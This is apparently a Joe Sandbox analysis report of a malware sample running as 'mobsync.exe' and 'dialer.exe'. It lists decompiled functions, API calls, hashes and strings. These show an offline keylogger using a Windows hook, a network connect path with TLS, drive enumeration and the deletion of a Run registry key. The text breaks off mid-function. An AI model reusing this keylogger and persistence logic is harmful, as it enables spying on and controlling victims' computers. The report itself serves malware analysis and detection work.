Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 3cd43d886a684b076c6079fada018412e0d69caa453358c08246a2e2d2815a1f
Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
Opcode Fuzzy Hash: 3cd43d886a684b076c6079fada018412e0d69caa453358c08246a2e2d2815a1f
Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00448967, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00448967(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E00441069(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043604F(_t23, _t23);
									goto L25;
								}
								if(E00441069(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x0044896c
0x0044896d
0x00448970
0x00448974
0x00448a1a
0x00448a2e
0x00448a33
0x00448a35
0x00448a3b
0x00448a3e
0x00448a40
0x00448a42
0x00448a42
0x00448a48
0x00448a4d
0x00448a4d
0x00448a37
0x00448a37
0x00000000
0x00448a37
0x0044897a
0x0044897f
0x00000000
0x00000000
0x00448985
0x0044898a
0x0044898c
0x0044898c
0x00448992
0x00000000
0x00000000
0x00448997
0x004489ae
0x004489ae
0x004489b7
0x004489b9
0x00000000
0x00000000
0x004489bb
0x004489c0
0x004489c2
0x004489c2
0x004489c8
0x00000000
0x00000000
0x004489cd
0x004489eb
0x004489eb
0x004489ed
0x00448a12
0x00000000
0x00448a17
0x00448a0a
0x00000000
0x00000000
0x00448a0c
0x00000000
0x00448a0c
0x004489cf
0x004489d7
0x00000000
0x00000000
0x004489d9
0x004489dc
0x004489e2
0x00000000
0x00000000
0x00000000
0x004489e4
0x004489e6
0x004489e8
0x004489e8
0x00000000
0x004489e8
0x00448999
0x004489a1
0x00000000
0x00000000
0x004489a3
0x004489a6
0x004489ac
0x00000000
0x00000000
0x00000000
0x004489ac
0x004489b2
0x004489b4
0x004489b4
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00448BC2,?,00000050,?,?,?,?,?), ref: 00448A42

Strings

OCP, xrefs: 004489BB
ACP, xrefs: 00448985

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
Instruction ID: eb9ed3db0900569e2555f6122bd78d83f5855a47a67a592497b5360646255e9a
Opcode Fuzzy Hash: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
Instruction Fuzzy Hash: 302106A2A00501A6FB348E559802BBF7366EB94B51F56802FE905F7301EF3ADD41C35A

Uniqueness

Uniqueness Score: -1.00%

Function 004049D2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
networkCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004049D2(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t12 = _t22 + 8;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10);
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = E0041C076(_t22, _t23);
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = E0041C0C4(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E0041CB45() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E00402064(_t22, _t33 - 0x18, "TLS Authentication failed");
					E00402064(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = E0041C23F(E004165D8(_t22, _t31),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				E0041C0BB(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}

0x004049d9
0x004049db
0x004049e0
0x004049e3
0x004049e9
0x004049ea
0x004049eb
0x004049ec
0x004049ed
0x004049f5
0x00404a23
0x00000000
0x00404a23
0x004049fa
0x00404a6a
0x00000000
0x00404a6a
0x004049fc
0x00404a01
0x00404a06
0x00000000
0x00000000
0x00404a08
0x00404a0d
0x00404a12
0x00404a18
0x00404a35
0x00000000
0x00000000
0x00404a37
0x00404a41
0x00404a50
0x00404a60
0x00404a65
0x00404a65
0x00404a1a
0x00404a1f
0x00000000

APIs

connect.WS2_32(?,?,00000010), ref: 004049ED

Strings

[ERROR], xrefs: 00404A4B
TLS Authentication failed, xrefs: 00404A3C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: f7b2aaf52d33c95ccaec6fcf79f3042739c4d86f2874e712db69713f0f416320
Instruction ID: 152706162a58c733358066f3432b6da4ca359658ad3caf7888de26e0204257cf
Opcode Fuzzy Hash: f7b2aaf52d33c95ccaec6fcf79f3042739c4d86f2874e712db69713f0f416320
Instruction Fuzzy Hash: 6401E9717802005BCF18BFB59A8657A3B56DF82305B04406BEE01AF2C7E97ADC44876E

Uniqueness

Uniqueness Score: -1.00%

Function 004063B9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063B9(void* __ebx, void* __ecx, char _a4) {
				char _v8;
				char _v32;
				char _v56;
				char _v80;
				void* __edi;
				void* __esi;
				CHAR* _t43;
				void* _t45;
				void* _t46;

				_t28 = __ebx;
				_t45 = __ecx;
				E004020B5(__ebx, __ecx);
				_t1 =  &_a4; // 0x406c74
				_t30 = _t1;
				_t43 = L00401F75(_t1);
				while( *_t43 != 0) {
					E0043A6FF(_t30, GetDriveTypeA(_t43),  &_v8, 0xa);
					_t46 = _t46 + 0xc;
					L00401FB1(_t45, _t19, _t45, E0040759E(_t28,  &_v32, E0040755A( &_v56, _t45, __eflags, L00401F75(E00402064(_t28,  &_v80,  &_v8))), _t43, __eflags, 0x2d));
					L00401FA7();
					L00401FA7();
					_t30 =  &_v80;
					L00401FA7();
					_t43 =  &(( &(_t43[1]))[lstrlenA(_t43)]);
					__eflags = _t43;
				}
				L00401FA7();
				return _t45;
			}

0x004063b9
0x004063c1
0x004063c3
0x004063c8
0x004063c8
0x004063d0
0x00406440
0x004063e2
0x004063e7
0x00406419
0x00406421
0x00406429
0x0040642e
0x00406431
0x0040643e
0x0040643e
0x0040643e
0x00406448
0x00406454

APIs

GetDriveTypeA.KERNEL32(00000000,?,0000000A,?,?), ref: 004063DB
lstrlenA.KERNEL32(00000000,00000000,0000002D), ref: 00406437

Strings

tl@, xrefs: 004063C8, 00406445

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DriveTypelstrlen
String ID: tl@
API String ID: 1700768220-321748133
Opcode ID: 43840fc7d26ff98b0c5f0d2ffb2daa8c2d54ae8b0278b0366c6c0df86f45bc9b
Instruction ID: d68784129cf781973e4bede6d0dbc5467035d2bcf0a2aa4a1d10c1b84e42a437
Opcode Fuzzy Hash: 43840fc7d26ff98b0c5f0d2ffb2daa8c2d54ae8b0278b0366c6c0df86f45bc9b
Instruction Fuzzy Hash: 4B019E71E002096ACB04FBA5EC56DADB7689F54704F50013FF406F30E1EF7C5A168289

Uniqueness

Uniqueness Score: -1.00%

Function 004095AB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004095AB(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t27;
				void* _t28;

				_t17 = __ebx;
				_t27 = __ecx;
				if( *((char*)(__ecx + 0x49)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t33 =  *0x46a9d4 - 0x32;
				_t26 = "Offline Keylogger Stopped";
				if( *0x46a9d4 != 0x32) {
					E00402064(__ebx,  &_v28, "Offline Keylogger Stopped");
					_t28 = _t28 - 0x18;
					L00416C32(_t28,  &_v28);
					E00409636(__ebx, _t27, _t33);
					L00401FA7();
				}
				_t29 = _t28 - 0x18;
				E00402064(_t17, _t28 - 0x18, _t26);
				E00402064(_t17, _t29 - 0x18, "[Info]");
				E004165D8(_t17, _t26);
				_t27[0x12] = 0;
				if(_t27[0x12] == 0 &&  *_t27 != 0) {
					UnhookWindowsHookEx( *_t27);
					 *_t27 =  *_t27 & 0x00000000;
				}
				return 1;
			}

0x004095ab
0x004095b2
0x004095b9
0x0040962e
0x00000000
0x0040962e
0x004095bb
0x004095c2
0x004095c7
0x004095cd
0x004095d2
0x004095da
0x004095e1
0x004095e9
0x004095e9
0x004095ee
0x004095f4
0x00409603
0x00409608
0x00409610
0x00409618
0x00409621
0x00409627
0x00409627
0x00000000

APIs

UnhookWindowsHookEx.USER32 ref: 00409621

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(?,00000000), ref: 004096EF

Strings

Offline Keylogger Stopped, xrefs: 004095C2, 004095C9, 004095F3
[Info], xrefs: 004095FE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: cf106d283290708a184d2e3ff02765b08d12b5677b23408b656cb46f20c7b6c8
Instruction ID: f59fa6ee72642e8cb032df677130fc087113d3809d92fc1fd18dfcd0b65af9b3
Opcode Fuzzy Hash: cf106d283290708a184d2e3ff02765b08d12b5677b23408b656cb46f20c7b6c8
Instruction Fuzzy Hash: 3201D231A0460057DB297779C90B3BE7BA14B42305F40047FD982222D3EABE495AC7DB

Uniqueness

Uniqueness Score: -1.00%

Function 0044132F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0044132F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x46a00c; // 0x44c884ad
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t31 = L00440C46(0x16, "LCMapStringEx", 0x4590ec, 0x4590f4);
				if(_t31 == 0) {
					LCMapStringW(E004413B7(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x45346c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0042F61B(_v8 ^ _t33);
			}

0x0044132f
0x00441334
0x00441335
0x0044133c
0x0044133f
0x00441356
0x0044135d
0x004413a0
0x0044135f
0x0044137c
0x00441382
0x00441382
0x004413b4

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,00428772), ref: 004413A0

Strings

@, xrefs: 0044137C
LCMapStringEx, xrefs: 0044134A

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$@
API String ID: 2568140703-230199810
Opcode ID: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
Instruction ID: 328293ae2da74c3881d3de9e1e1d62cea5772e6c780c88eb29c835c9fd5874b5
Opcode Fuzzy Hash: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
Instruction Fuzzy Hash: 3C012532500209FBDF125F90DC02EEE7F62EF08755F004126FE0426161CA3AC971EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00441129, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMON

Download Yara Rule

APIs

GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004401EB,?,00000000,00401D19), ref: 00441182

Strings

@, xrefs: 0044116D
GetTimeFormatEx, xrefs: 0044113A, 00441144

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FormatTime
String ID: GetTimeFormatEx$@
API String ID: 3606616251-597012884
Opcode ID: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
Instruction ID: 597dd883ab71028faa77f39812b87aa423b0666660f34cf126ad643169d29e88
Opcode Fuzzy Hash: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
Instruction Fuzzy Hash: DCF0C83164021CFBDF126F61DC02EAF7F21EF08B51F10452AFE05172A1CA798D259B99

Uniqueness

Uniqueness Score: -1.00%

Function 00441199, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00441199(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t7;
				void* _t20;
				intOrPtr* _t23;
				signed int _t25;

				_t20 = __edx;
				_t16 = __ecx;
				_push(__ecx);
				_t7 =  *0x46a00c; // 0x44c884ad
				_v8 = _t7 ^ _t25;
				_t23 = L00440C46(0x11, "GetUserDefaultLocaleName", 0x4590a4, "GetUserDefaultLocaleName");
				if(_t23 == 0) {
					E004412C5(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
				} else {
					 *0x45346c(_a4, _a8);
					 *_t23();
				}
				return E0042F61B(_v8 ^ _t25);
			}

0x00441199
0x00441199
0x0044119e
0x0044119f
0x004411a6
0x004411c0
0x004411c7
0x004411ea
0x004411c9
0x004411d1
0x004411d7
0x004411d7
0x004411fd

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00448438,?,00000055,00000050), ref: 004411E3

Strings

@, xrefs: 004411D1
GetUserDefaultLocaleName, xrefs: 004411AA, 004411B4

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DefaultUser
String ID: GetUserDefaultLocaleName$@
API String ID: 3358694519-2432190263
Opcode ID: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
Instruction ID: 3ac9f703888ec721985dbf6bd802d6cf8197e55589d78a152d54f94c28d6ea82
Opcode Fuzzy Hash: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
Instruction Fuzzy Hash: 90F02B30600218FBDB106F61DC02E5E7FA0EF04B11F104466FD05561A2DA758E149BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00441262, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00441262(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46a00c; // 0x44c884ad
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = L00440C46(0x15, "IsValidLocaleName", 0x4590d0, "IsValidLocaleName");
				if(_t18 == 0) {
					IsValidLocale(E004413B7(_t13, _t18, __eflags, _a4, 0), 1);
				} else {
					 *0x45346c(_a4);
					 *_t18();
				}
				return E0042F61B(_v8 ^ _t20);
			}

0x00441262
0x00441267
0x00441268
0x0044126f
0x00441272
0x00441289
0x00441290
0x004412ae
0x00441292
0x00441297
0x0044129d
0x0044129d
0x004412c2

APIs

IsValidLocale.KERNEL32(00000000,0043CFD0,00000000,00000001,?,?,0043CFD0,?,?,0043C9B0,?,00000004), ref: 004412AE

Strings

IsValidLocaleName, xrefs: 00441273, 0044127D
@, xrefs: 00441297

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$@
API String ID: 1901932003-2778040366
Opcode ID: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
Instruction ID: 51e1be3ffe8f4d9107f84abeff18eb9e3ab6bbbe641bbbca65fbd3cae13f37de
Opcode Fuzzy Hash: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
Instruction Fuzzy Hash: 23F05930640708F7DB106F20DC02FAE7B54DB00B12F10016AFD05B72D1DAB88D148A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00441200, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00441200(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x46a00c; // 0x44c884ad
				_v8 = _t8 ^ _t22;
				_t20 = L00440C46(0x14, "InitializeCriticalSectionEx", 0x4590c8, 0x4590d0);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x45346c(_a4, _a8, _a12);
					 *_t20();
				}
				return E0042F61B(_v8 ^ _t22);
			}

0x00441205
0x00441206
0x0044120d
0x00441227
0x0044122e
0x0044124b
0x00441230
0x0044123b
0x00441241
0x00441241
0x0044125f

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044437F,-00000020,00000FA0,00000000,?,?), ref: 0044124B

Strings

InitializeCriticalSectionEx, xrefs: 0044121B
@, xrefs: 0044123B

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$@
API String ID: 2593887523-1288605549
Opcode ID: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
Instruction ID: d51398674981bb72eabf597e0de5951d7e9872e17945c585b36a5d9ca4153329
Opcode Fuzzy Hash: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
Instruction Fuzzy Hash: 98F02431600218FBCB115F50DC02EAEBF60EF04712B10406AFC096A271DA758E24DA99

Uniqueness

Uniqueness Score: -1.00%

Function 004410D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00435084), ref: 00441112

Strings

GetSystemTimePreciseAsFileTime, xrefs: 004410EE
@, xrefs: 00441108

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$@
API String ID: 2086374402-2730348301
Opcode ID: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
Instruction ID: 905004eebb46221c2d070f6dd192413a4baa945a661a41a47a192c014b97a96b
Opcode Fuzzy Hash: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
Instruction Fuzzy Hash: 99E05531B40218F787116F24AC0293FBB60DB88B13B10027AFC0517293D9384E049AEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041074C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041074C(void* __ecx, short* __edx, short* _a4) {
				void* _v8;
				signed int _t6;

				_push(__ecx);
				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
					_t6 = RegDeleteValueW(_v8, _a4);
					asm("sbb al, al");
					return  ~_t6 + 1;
				}
				return 0;
			}

0x0041074f
0x00410762
0x0041076e
0x00410776
0x00000000
0x00410778
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040B1B3,00000000,?,0046C518,0046C500), ref: 0041075A
RegDeleteValueW.ADVAPI32(0046C500,0046C518,?,0040B1B3,00000000,?,0046C518,0046C500), ref: 0041076E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410758

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: fd50351cb878996428abd180954675247ff4656cbe18f50bc3b08d1d193439b0
Instruction ID: 971222eff077ece9fdb154370be5c3b5718d79bba31bbd66a01c176854c20e2b
Opcode Fuzzy Hash: fd50351cb878996428abd180954675247ff4656cbe18f50bc3b08d1d193439b0
Instruction Fuzzy Hash: 36E08C71140308BBEE105FB09C06FEA376CEB01F82F1002A5B906920D1C666AA459A64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dialer.exe PID: 6544 Parent PID: 5384 dialer.exeCOMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	99.8%
Signature Coverage:	0%
Total number of Nodes:	423
Total number of Limit Nodes:	14

Executed Functions

Function 0043B789, Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0043B789(int _a4) {
				void* _t14;
				void* _t16;

				if(E00441445(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0043B80E(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x0043b795
0x0043b7b1
0x0043b7b1
0x0043b7ba
0x0043b7c3

APIs

GetCurrentProcess.KERNEL32(0000000C,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7AA
TerminateProcess.KERNEL32(00000000,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7B1
ExitProcess.KERNEL32 ref: 0043B7C3

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
Instruction ID: 91f09eb10ad8882fafd7c3a50809be48a5acae071be7bd6b9a99ec4421295efe
Opcode Fuzzy Hash: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
Instruction Fuzzy Hash: D9E0B631400648ABCF12AF55DD0AA993B69EF94787F004065FA058A632CB39DE92CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042F1CD, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042F1CD() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
				return _t1;
			}

0x0042f1d2
0x0042f1d8

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002F1D9,0042EF00), ref: 0042F1D2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C641, Relevance: 53.3, APIs: 15, Strings: 15, Instructions: 769
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040C641(void* __edx, void* __eflags, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
